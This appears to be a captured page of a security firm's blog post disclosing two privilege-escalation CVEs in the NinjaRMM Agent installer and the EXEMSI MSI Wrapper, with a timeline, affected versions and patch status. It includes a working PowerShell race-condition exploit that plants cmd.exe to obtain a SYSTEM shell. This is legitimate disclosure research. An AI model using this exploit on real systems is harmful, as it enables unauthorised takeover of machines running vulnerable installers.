improsec.com Open in urlscan Pro
2a06:98c1:3121::3  Public Scan

Form analysis
0 forms found in the DOM

Text Content

powered by: Cookie Information


YOU CONTROL YOUR DATA

We and our business partners use technologies, including cookies, to collect
information about you for various purposes, including:

 1. Functional
 2. Statistical
 3. Marketing

By clicking ‘Accept’, you give your consent for all these purposes. You can also
choose to specify the purposes you consent to by ticking the checkbox next to
the purpose and clicking ‘Save settings’.
You may withdraw your consent at any time by clicking the small icon at the
bottom left corner of the website.
You can read more about how we use cookies and other technologies and how we
collect and process personal data by clicking the link. Read more about cookies
Decline all Save settings Accept all
Show details Hide details


STRICTLY NECESSARY

Strictly necessary cookies help make a website navigable by activating basic
functions such as page navigation and access to secure website areas. Without
these cookies, the website would not be able to work properly.
Service: Cookie Information
Purpose: Supports the website's technical functions.
Privacy policy: Cookie Information - Privacy policy
Expiry: a year
Name: CookieInformationConsent
Vendor: improsec.com


FUNCTIONAL

Functional cookies make it possible to save information that changes the way the
website appears or acts. For instance your preferred language or region.
Service: GitHub
Purpose: Collects information about the users and their activity on the website,
which is used to deliver personalized customer service and content.
Privacy policy: GitHub - Privacy policy
Expiry: a year
Name: logged_in
Vendor: .github.com
Service: Squarespace
Purpose:
Privacy policy: Squarespace - Privacy policy
Expiry: a few seconds
Name: RecentRedirect
Vendor: .improsec.com
Service: GitHub
Purpose: Collects information about the users and their activity on the website
for analytics and reporting purposes.
Privacy policy: GitHub - Privacy policy
Expiry: a year
Name: _octo
Vendor: .github.com
Service: GitHub
Purpose: Collects information about the users and their activity on the website.
The information is used to track and analyze user behavior and to meet
individual user needs.
Privacy policy: GitHub - Privacy policy
Expiry: Session
Name: _gh_sess
Vendor: github.com


STATISTICAL

Statistical cookies help the website owner understand how visitors interact with
the website by collecting and reporting information.
Service: Squarespace
Purpose: Supports the functions of a "Content Management System" with built-in
user behavior analyzes.
Privacy policy: Squarespace - Privacy policy
Expiry: 2 years
Name: ss_cvr
Vendor: improsec.com
Service: Google Analytics
Purpose: Collects information about the users and their activity on the website
for analytics and reporting purposes.
Privacy policy: Google Analytics - Privacy policy
Expiry: a few seconds
Name: _gat_UA-xxx-xxx
Vendor: .improsec.com
Service: Google Analytics
Purpose: Collects information about the users and their activity on the website
for analytics and reporting purposes.
Privacy policy: Google Analytics - Privacy policy
Expiry: a day
Name: _gid
Vendor: .improsec.com
Service: LinkedIn
Purpose: Collects information about the users and their activity on the website
for analytics and reporting purposes.
Privacy policy: LinkedIn - Privacy policy
Expiry: a day
Name: ln_or
Vendor: .improsec.com
Service: Squarespace
Purpose: Supports the functions of a "Content Management System" with built-in
user behavior analyzes.
Privacy policy: Squarespace - Privacy policy
Expiry: Session
Name: crumb
Vendor: www.improsec.com
Service: Squarespace
Purpose: Supports the functions of a "Content Management System" with built-in
user behavior analyzes.
Privacy policy: Squarespace - Privacy policy
Expiry: 30 minutes
Name: ss_cvt
Vendor: improsec.com
Service: Google Analytics
Purpose:
Privacy policy: Google Analytics - Privacy policy
Expiry: 2 years
Name: _ga_xxx
Vendor: .improsec.com
Service: Google Analytics
Purpose: Collects information about the users and their activity on the website
for analytics and reporting purposes.
Privacy policy: Google Analytics - Privacy policy
Expiry: 2 years
Name: _ga
Vendor: .improsec.com


MARKETING

Marketing cookies are used to track visitors across websites. The intention is
to display ads that are relevant and interesting to the individual user and thus
more valuable for publishers and third-party advertisers.
Service: Youtube, Google
Purpose: Collects information about the users and their activity on the website
through embedded video players with the purpose of delivering targeted
advertising.
Privacy policy: Youtube, Google - Privacy policy
Expiry: Session
Name: YSC
Vendor: .youtube.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: a day
Name: lidc
Vendor: .linkedin.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: a year
Name: bscookie
Vendor: .www.linkedin.com
Service: Facebook
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: Facebook - Privacy policy
Expiry: Session
Name:
Vendor: www.facebook.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: a month
Name: UserMatchHistory
Vendor: .linkedin.com
Service: LinkedIn
Purpose: Collects information about the users and their activity on the website.
The Information is used to track and analyze user behavior, to meet the
individual user needs and to deliver targeted advertising.
Privacy policy: LinkedIn - Privacy policy
Expiry: a month
Name: AnalyticsSyncHistory
Vendor: .linkedin.com
Service: Youtube, Google
Purpose: Collects information about the users and their activity on the website
through embedded video players with the purpose of delivering targeted
advertising.
Privacy policy: Youtube, Google - Privacy policy
Expiry: 6 months
Name: VISITOR_INFO1_LIVE
Vendor: .youtube.com
Service: Facebook
Purpose: Identifies browsers for the purposes of providing advertising and site
analytics services.
Privacy policy: Facebook - Privacy policy
Expiry: 3 months
Name: _fbp
Vendor: .improsec.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: Session
Name: lang
Vendor: .ads.linkedin.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: a year
Name: bcookie
Vendor: .linkedin.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: Session
Name: lang
Vendor: .linkedin.com
Service: LinkedIn
Purpose: Supports online marketing by collecting information about the users to
promote products through partners and other platforms.
Privacy policy: LinkedIn - Privacy policy
Expiry: 6 months
Name: li_gc
Vendor: .linkedin.com
Service: Youtube, Google
Purpose: Collects information about the users and their activity on the website
through embedded video players with the purpose of delivering targeted
advertising.
Privacy policy: Youtube, Google - Privacy policy
Expiry: 2 years
Name: CONSENT
Vendor: .youtube.com


UNCLASSIFIED

We are in the process of classifying unclassified cookies together with the
providers of the individual cookies.
Service:
Purpose:
Expiry: Session
Name: 319af4c0-e197-4de9-8a9b-fe98c8a2ca04
Vendor: 3671609f6e304a7caf10fbcf15c6068c.svc.dynamics.com
Service:
Purpose:
Expiry: Session
Name: msd365mkttrs
Vendor: improsec.com
Service:
Purpose:
Expiry: 2 years
Name: msd365mkttr
Vendor: improsec.com
Service:
Purpose:
Expiry: 2 years
Name: 79f08280-5c63-4331-b04d-fb6f39afda51
Vendor: 3671609f6e304a7caf10fbcf15c6068c.svc.dynamics.com
Strictly necessary
Functional
Statistical
Marketing
powered by: Cookie Information


COOKIE POLICY

Your consent applies to the following domains: improsec.com The cookie policy
was last updated on 12.12.2022
Settings Accept all


WHAT IS A COOKIE?

A cookie is a small data file stored in your computer, tablet or smartphone. A
cookie is not a program that can contain harmful malware or virus.


HOW OUR WEBSITE USES COOKIES

Some cookies perform essential functions for our website. Cookies also help us
get an overview of your visit to our website so we can continuously optimize and
tailor the experience to your needs and interests. For example, cookies remember
things like the items added to the shopping cart; whether you have visited our
website before; if you are logged in; and the specific language and currency you
prefer to see on the website. We also use cookies to target our ads specifically
to you on other websites. In general, we use cookies as part of our service to
present you with content that is as relevant to you as possible.

You can see the specific services that store cookies and why they do it, under
the different categories:

 1. Functional
 2. Statistical
 3. Marketing


HOW LONG ARE COOKIES STORED?

The length of time a cookie is stored on your devices and browsers varies. The
lifetime is calculated according to your last visit to the website. When a
cookie expires, it is automatically deleted. All our cookies’ lifetimes are
specified in our cookie policy.


HOW TO BLOCK OR DELETE COOKIES

You may at any time block all or just third-party cookies completely by changing
the browser settings on your computer, tablet or smartphone. The location of
these settings will depend on the browser you use. However, you should be aware
that if you block all or just third-party cookies, there may be functions and
services that you will be unable to use on the website (because these depend on
cookies).
You can opt-out of cookies from Google Analytics here.


HOW CAN YOU DELETE COOKIES?

It is easy to delete cookies that you have previously accepted. It depends on
which browser (Chrome, Firefox, Safari, etc.) and device (smartphone, tablet,
PC, Mac) you are using.
You can typically find this information under settings – Security and Privacy –
but this may vary from one browser to another. Specify which device/browser you
are using (click the appropriate link):

 * Internet Explorer
 * Microsoft Edge
 * Mozilla Firefox
 * Google Chrome
 * Opera
 * Safari
 * Flash cookies
 * Apple
 * Android
 * Chrome, Android


CHANGING YOUR CONSENT

You can change your consent by either deleting cookies from your browser or by
changing your original choice by clicking the link below:

You can change your consent by clicking here

Remember: If you use more than one browser, you must delete cookies in all of
them.


DO YOU HAVE ANY QUESTIONS?

If you have any comments or questions relating to our information and/or
processing of personal data, please feel welcome to contact us. The cookie
policy itself is updated once a month by Cookie Information. If you have any
questions about our cookie policy, you are welcome to contact Cookie Information
on their website.

Functional Statistical Marketing

Are you under attack?

Call +4591959595 or click here

Home
Strategic
All Strategic Services
• Advisory to Security Leaders
• CISO as a Service
• Communicating Cyber Risk and Security
• Crisis Management
• Cyber Due Diligence
• Cyber Risk Management
• Cyber Security Awareness
• Cyber Security Roadmap
• Security Governance
Inspire
All INSPIRE Services
• How to build excellent detection
• How to select your new SOC provider
• Public Speaking
• Secure Development Training
Identify
All IDENTIFY Services
• AD Certificate Services (PKI) Analysis
• AD Password Analysis
• AD Security Analysis
• Azure Cloud resources Security Analysis
• Backup and Restore Assessment
• Cyber Security Maturity
• Compromise Assessment
• External Penetration Test
• Firewall Assessment
• ICS and SCADA Security
• Internal Penetration Test
• Maritime Cyber Security
• Mobile Application Test
• Mobile Device Security
• Network Shares Security Analysis
• Microsoft 365 Security
• Penetration Test as a Service
• Red Team Test
• Reverse Engineering
• Technical Phishing Test
• TIBER Red Team Test
• Vulnerability Scanning
• Web Application Test
• Web Service Test
• Windows System Analysis
Improve
All IMPROVE Services
• AD Security Hardening
• Application Control
• Office 365 Hardening
• Privileged Access Workstation
• Public Cloud Hardening
• Security Advisory
• Microsoft Active Directory Tiering
Investigate
All INVESTIGATE Services
• Digital Forensics
• Incident Response
• Microsoft Sentinel SIEM Enablement
BLOGS
TECH BLOG
CYBER BLOG
COMPANY
ABOUT US
OUR TEAM
Our History
Awards and Accolades
Memberships and Accreditations
RESPONSIBLE DISCLOSURE
PRIVACY POLICY
COOKIE POLICY
CONTACT
JOBS
REFERENCES
Dansk
Home
Strategic
All Strategic Services
• Advisory to Security Leaders
• CISO as a Service
• Communicating Cyber Risk and Security
• Crisis Management
• Cyber Due Diligence
• Cyber Risk Management
• Cyber Security Awareness
• Cyber Security Roadmap
• Security Governance
Inspire
All INSPIRE Services
• How to build excellent detection
• How to select your new SOC provider
• Public Speaking
• Secure Development Training
Identify
All IDENTIFY Services
• AD Certificate Services (PKI) Analysis
• AD Password Analysis
• AD Security Analysis
• Azure Cloud resources Security Analysis
• Backup and Restore Assessment
• Cyber Security Maturity
• Compromise Assessment
• External Penetration Test
• Firewall Assessment
• ICS and SCADA Security
• Internal Penetration Test
• Maritime Cyber Security
• Mobile Application Test
• Mobile Device Security
• Network Shares Security Analysis
• Microsoft 365 Security
• Penetration Test as a Service
• Red Team Test
• Reverse Engineering
• Technical Phishing Test
• TIBER Red Team Test
• Vulnerability Scanning
• Web Application Test
• Web Service Test
• Windows System Analysis
Improve
All IMPROVE Services
• AD Security Hardening
• Application Control
• Office 365 Hardening
• Privileged Access Workstation
• Public Cloud Hardening
• Security Advisory
• Microsoft Active Directory Tiering
Investigate
All INVESTIGATE Services
• Digital Forensics
• Incident Response
• Microsoft Sentinel SIEM Enablement
BLOGS
TECH BLOG
CYBER BLOG
COMPANY
ABOUT US
OUR TEAM
Our History
Awards and Accolades
Memberships and Accreditations
RESPONSIBLE DISCLOSURE
PRIVACY POLICY
COOKIE POLICY
CONTACT
JOBS
REFERENCES
Dansk
May 11, 2021

Martin Sohn Christensen
Privilege escalation vulnerability in NinjaRMM Agent MSI Installer introduced by
EXEMSI MSI Wrapper
Martin Sohn Christensen
May 11, 2021


PRIVILEGE ESCALATION VULNERABILITY IN NINJARMM AGENT MSI INSTALLER INTRODUCED BY
EXEMSI MSI WRAPPER

Martin Sohn Christensen
May 11, 2021

During a customer engagement I identified a local escalation of privilege
vulnerability (CVE-2021-26273) in a remote monitoring and management (RMM) tool:
NinjaRMM Agent. The vulnerability allowed a non-administrative user to become
”NT Authority\SYSTEM”.

Since the RMM tool was deployed on most of the customer’s systems, the newfound
vulnerability, in combination with lateral movements, made it easy to compromise
any of the customer’s most critical systems.

Post-discovery, I went into talks with NinjaRMM who identified the vulnerability
stemming from a tool in their software; EXEMSI MSI Wrapper which allows a
software vendor to “wrap” an EXE-file in an MSI-file which allows easier
deployment. The MSI Wrapper itself and systems with it installed are not
vulnerable, but any MSI-files created with the tool could be (CVE is pending).

I have spent additional time identifying and contacting other software vendors
using MSI Wrapper to ensure they have awareness and mitigated the vulnerability
in their newest deployments.

I also discovered an additional vulnerability (CVE-2021-26274) in the NinjaRMM
Agent, not nearly as interesting, but a vulnerability, nonetheless.

Both vulnerabilities of NinjaRMM Agent are described in this blogpost. The local
privilege escalation vulnerability exploitation steps will vary depending on how
the software vendor customizes the MSI-file and how the MSI-file is deployed.


CVES REGISTERED

 * NinjaRMM Agent
   
   * CVE: CVE-2021-26273
   
   * CVE: CVE-2021-26274
   
   * Update regarding the CVEs from Ninja


AFFECTED VERSIONS

 * EXEMSI MSI Wrapper prior to version 10.0.50 and at least since version 6.0.91

 * NinjaRMM Agents prior to version 5.0.4.0, since version 4.0.0


TIMELINE

 * NinjaRMM
   
   * 2021/01/13: Vulnerability discovered during customer engagement.
   
   * 2021/01/18: Contacted NinjaRMM via phone call – was told they would return
     via e-mail.
   
   * 2021/01/22: Received no response. Contacted NinjaRMM CSO via LinkedIn.
   
   * 2021/01/23: Discovered second vulnerability.
   
   * 2021/01/25: Contacted by NinjaRMM CSO.
   
   * 2021/01/27: Vulnerability confirmed and mitigation in progress.
   
   * 2021/01/28: NinjaRMM patched all deployed NinjaRMM Agents.

 * EXEMSI MSI Wrapper
   
   * 2021/01/27: Potential vulnerability discovered based on information from
     NinjaRMM.
   
   * 2021/01/27: Contacted EXEMSI via phone call.
   
   * 2021/02/03: Confirmed mitigation in updated version provided by vendor.


CVE-2021-26273 – WINDOWS INSTALLER LOCAL PRIVILEGE ESCALATION


DESCRIPTION

The NinjaRMM Agent version 5.0.909 Windows Installer executes an EXE-file as ”NT
Authority\SYSTEM” from the directory “%TEMP%\MW-<GUID>\” with the name
“<GUID>-<ORGANIZATION SPECIFIC STRING>-<version>-windows-installer.exe”.

Default permissions of both the directory and the executable file grants
non-administrative users write access.

Due to the weak permissions, an attacker could place the executable file before
the Windows Installer, lock the file for write access, and wait for the
installer to execute the file as ”NT Authority\SYSTEM”.

This type of vulnerability, how to exploit and mitigate it is also described in
the following resources:

 * A responsible disclosure webinar held by my colleague Anders Kusk and Lasse
   Trolle Borup, which describes the strange behaviour of the Windows Installer
   API.

 * A blog post by my colleague Anders Kusk: The many pitfalls of Windows MSI -
   Privilege escalation in Windows 7/8.1/10/Server and a range of third-party
   products.

 * SandboxEscaper’s Chasing polar bears: part one and part two.





WALKTHROUGH

The Author property of files in C:\Windows\Installer reveals that a NinjaRMM
software has a Windows Installer file:



The identified file is NinjaRMM Agent:



The Windows Installer can be executed with msiexec.exe by a non-administrative
user:

msiexec.exe /fa C:\Windows\Installer\<name>.msi

During execution, SysInternals Process Monitor was used to monitor actions of
the process. It was identified that an .exe is created by the executing
non-administrative user (seen by the property Integrity: Medium):



And later the same file is executed by SYSTEM without impersonation (SYSTEM also
does other operations on the file, but none which affect this demonstrated
exploit):



A tip is: “If you do file operations on Windows on unprotected directories, you
must do it with an impersonated token [instead of the primary token] or else you
risk a file manipulation attack”[1]

Inspecting permissions of the directory and executable reveals that it is indeed
unprotected (our non-administrative user has Full control):



So how do we do this “file manipulation attack”? Since the non-administrative
user has write permission to the directory and file, we can exploit the race
condition by placing our own executable file (or symbolic link) before the
installer, lock the file for writing, and wait for the installer to execute the
file.

However, the directory name in which the file resides, contains a GUID unique to
each execution which we need to know before placing our file. The directory’s
name is:

“%TEMP%\MW-<RANDOM GUID>”

The file’s name also contains a GUID but was concluded to be static when tested
on multiple systems with the same installer. Executing the installer once gives
you this name when inspecting the “%TEMP%\MW-<RANDOM GUID>\” directory. The
file’s name is:

“<STATIC GUID>-< ORGANIZATION SPECIFIC STRING>-<VERSION>-windows-installer.exe”.

To develop the exploit, I used PowerShell. The code below performs the following
logic:

Disclaimer: PowerShell is slow for race conditions + the code can be optimized
in multiple ways to increase chances of “winning”.

 1. Load an executable file in memory (I will use cmd.exe), ready to be placed
    into the directory as the executable file.

 2. Continuously check for the directory containing a random GUID.

 3. Create the executable file.
    
    1. If successful, lock the file for writing, to protect it from modification
       from the legitimate NinjaRMM Agent Windows Installer.

 4. Pauses the script to wait for the Windows Installer to execute the
    executable.

[byte[]] $exeBytes = (Get-Content -Encoding Byte -Path C:\Windows\System32\cmd.exe) -split ' '
$dir = $null
$exe = "883f27ea-79a5-4c31-8fe9-7fe32cccc582-<ORGANIZATION SPECIFIC STRING>-4.5.6152-windows-installer.exe"
Write-Host "exe loaded, launch installer now."
while(1) {
    $dir = Get-Item "C:\Users\John Doe\AppData\Local\Temp\MW-*"
    if ($dir) {
        $exePath = $dir.FullName + "\" + $exe

        try {
            [System.IO.File]::WriteAllBytes($exePath, $exeBytes)
            $fileStream = [System.IO.File]::Open($exePath, "Open", "Read", "Read")
        
            Read-Host "Press return when done/if you get shell (to release file lock)."
        
            $fileStream.Close()
        } catch {
            Read-Host "Lost race condition."
        }
        return
    }
} 

The exploit is demonstrated on our Improsec YouTube channel:



The exploit is also be seen by relating the numbers in the list below to numbers
seen in the screenshot:

 1. The exploit code being executed.

 2. Executing the NinjaRMM Agent Windows Installer.

 3. The Ninja RMM Agent Windows Installer executing.

 4. The executable file (cmd.exe) opened by Windows Installer as “NT
    Authority\SYSTEM”.



Inspecting a Process Monitor capture from a successful exploit we see:

 1. PowerShell querying for the randomly named directory.

 2. MsiExec creating the directory.

 3. PowerShell finding the directory.

 4. Powershell successfully creating our file (copy of cmd.exe).

 5. MsiExec failing in creating the installer file.

 6. Later on Process Monitor will show MsiExec.exe executing the file.




CVE-2021-26274 – INSECURE DEFAULT PERMISSIONS ON NINJARMM AGENT PROGRAMDATA
DIRECTORY


DESCRIPTION

The directory “C:\ProgramData\NinjaRMMAgent”, created during NinjaRMM Agent
installation, allows “BUILTIN\Users” to write to the folder and subfolders:



Since the NinjaRMM Agent service, running as “NT Authority\SYSTEM”, creates,
writes to, and deletes logfiles in this directory, it would be possible to
redirect the actions to local arbitrary paths. This could result in loss of
integrity on system-critical files stored in C:\Windows, leading to denial of
service.



No proof-of-concept was made for this vulnerability, but again I refer to
SandboxEscaper’s blogs and for tools to exploit I recommend James Forshaw’s
symboliclink-testing-tools.




[1]
https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease

Tagged: Vulnerability, Responsible Disclosure, Research

7 Likes
Share


Newer PostUpdates to Improsec Password Solutions
Older PostImproHound - Identify AD tiering violations




GET IN TOUCH TODAY FOR A SAFER TOMORROW…

Contact Improsec
Back to Top
 

 

Improsec A/S • Amagerfælledvej 106, 3. • 2300 Copenhagen S • Telefon: (+45) 5357
5337 • E-mail: info@improsec.com